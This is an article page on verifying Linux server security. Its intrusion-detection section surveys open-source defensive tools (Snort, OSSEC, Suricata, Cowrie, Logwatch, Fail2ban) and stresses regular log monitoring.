Linux Security
    Linux Security
    Linux Security

    Verifying Linux Server Security: What Every Admin Needs to Know - Intrusion Detection

    Date 02 Dec 2020
    9372
    Posted By Brittany Day

    Article Index

     

    Intrusion Detection

    Intrusion detection, or monitoring a network or system for malicious activity or policy violations, is a critical part of maintaining a secure Linux server. The information gathered through intrusion detection provides administrators with valuable insight into the types of attacks that could potentially threaten their servers, which is critically important information for setting up preventative defenses. In this section, we’ll begin by examining some great open-source intrusion detection system (IDS) tools and honeypots that can help Linux server administrators proactively identify and respond to threats to their systems - preventing data theft and system compromise. We’ll then explore the importance of monitoring logs and take a look at how Logwatch can be used for this purpose.

    Top Open-Source IDS Tools & Honeypots

    Snort

    Snort is the leader in free and open-source network intrusion detection systems (NIDS). The popular tool has three modes that can be used to analyze real-time traffic: intrusion detection mode, packet sniffer mode and packet logger mode. The intrusion detection mode is based on a set of rules that the user can either create or download from the Snort community. Snort can be used for port scanning, OS fingerprinting and detecting attacks using signature-based and anomaly-based techniques. Snort is easy to install and supported by a large, vibrant community. 

    Snort can be downloaded here.

    Learn how to install and use Snort for intrusion detection in this LinuxHint tutorial.

    OSSEC

    In the realm of host-based intrusion detection systems (HIDS), OSSEC dominates. This full-featured open-source IDS tool is highly effective and extensible. OSSEC’s client/server based management and logging architecture secures sensitive information against tampering and theft by delivering alerts and logs to a centralized server where analysis and notification can occur even in the event that the host system is compromised or taken offline. A convenient benefit of this client/server design is the ability to centrally manage agents from a single server. OSSEC is very lightweight and is backed by a strong, supportive community.

    OSSEC can be downloaded here.

    Learn how to install and use OSSEC for intrusion detection in this LinuxHint tutorial.

    Suricata

    Suricata is a modern NIDS that employs signature-based, anomaly-based and policy driven intrusion detection methods. It features multi-threading capabilities, GPU acceleration and multiple model statistical anomaly detection. Suricata can examine HTTP requests, TLS/SSL certificates and DNS transactions. Suricata is compatible with Snort's data structure, enabling users to implement Snort policies in Suricata. 

    Suricata can be downloaded here.

    Learn how to configure and use Suricata for threat detection in this InfoSec Institute tutorial.

    Cowrie

    Cowrie is a medium interaction ssh and telnet honeypot that logs brute force attacks and shell interaction. The open-source honeypot emulates a Unix system in Python and functions as a proxy to log malicious activity. Cowrie features JSON logging for easy processing in log management solutions.

    Monitoring Logs 

    Monitoring logs is an essential part of verifying the security of a server, and must be done on a regular basis to ensure that your systems remain secure. Critical log categories that should be monitored for all Linux servers include application logs, event logs, service logs and system logs. Many Linux distributions offer tools for automating this ongoing task. 

    The Logwatch application, for instance, sends a daily email report of all of the logs on a server - providing administrators with valuable information including potential malicious activity, SSH attempts and IPs causing errors, as well as the number of emails that have been sent. In a large corporate environment it is common practice to send Logwatch emails (along with other mail directed to the root user) to a single company email list. Administrators in the company then subscribe to this email list to stay informed of any notifications regarding suspicious activity detected in any of the company’s server’s logs.

    Logwatch

    Logwatch can be downloaded here.

    Learn how to install and use Logwatch in this TechRepublic tutorial.

    Fail2ban is another excellent application for monitoring logs and detecting intrusion attempts. This intrusion prevention software framework secures servers against brute-force attacks by reacting to intrusion attempts by either installing firewall rules to reject potentially-malicious IP addresses for a certain amount of time or by blocking access to a specific port.

    Fail2ban can be downloaded here.

    Learn how to install, configure and test Fail2ban in this How-To Geek tutorial.

    For information on log files locations and how you can view and monitor logs from the command line, check out this Ubuntu tutorial.

    Advisories

    LinuxSecurity Poll

    'Tis the season of giving! How have you given back to the open-source community?

    No answer selected. Please try again.
    Please select either existing option or enter your own, however not both.
    Please select minimum 0 answer(s) and maximum 3 answer(s).
    /main-polls/49-tis-the-season-of-giving-how-have-you-given-back-to-the-open-source-community?task=poll.vote&format=json
    49
    radio
    [{"id":"171","title":"I've contributed to the development of an open-source project.","votes":"11","type":"x","order":"1","pct":34.38,"resources":[]},{"id":"172","title":"I've reviewed open-source code for security bugs.","votes":"6","type":"x","order":"2","pct":18.75,"resources":[]},{"id":"173","title":"I've made a donation to an open-source project.","votes":"15","type":"x","order":"3","pct":46.88,"resources":[]}] ["#ff5b00","#4ac0f2","#b80028","#eef66c","#60bb22","#b96a9a","#62c2cc"] ["rgba(255,91,0,0.7)","rgba(74,192,242,0.7)","rgba(184,0,40,0.7)","rgba(238,246,108,0.7)","rgba(96,187,34,0.7)","rgba(185,106,154,0.7)","rgba(98,194,204,0.7)"] 350

    Please vote first in order to view vote results.


    VIEW MORE POLLS

    bottom 200

    Please enable / Bitte aktiviere JavaScript!
    Veuillez activer / Por favor activa el Javascript![ ? ]

    We use cookies to provide and improve our services. By using our site, you consent to our Cookie Policy.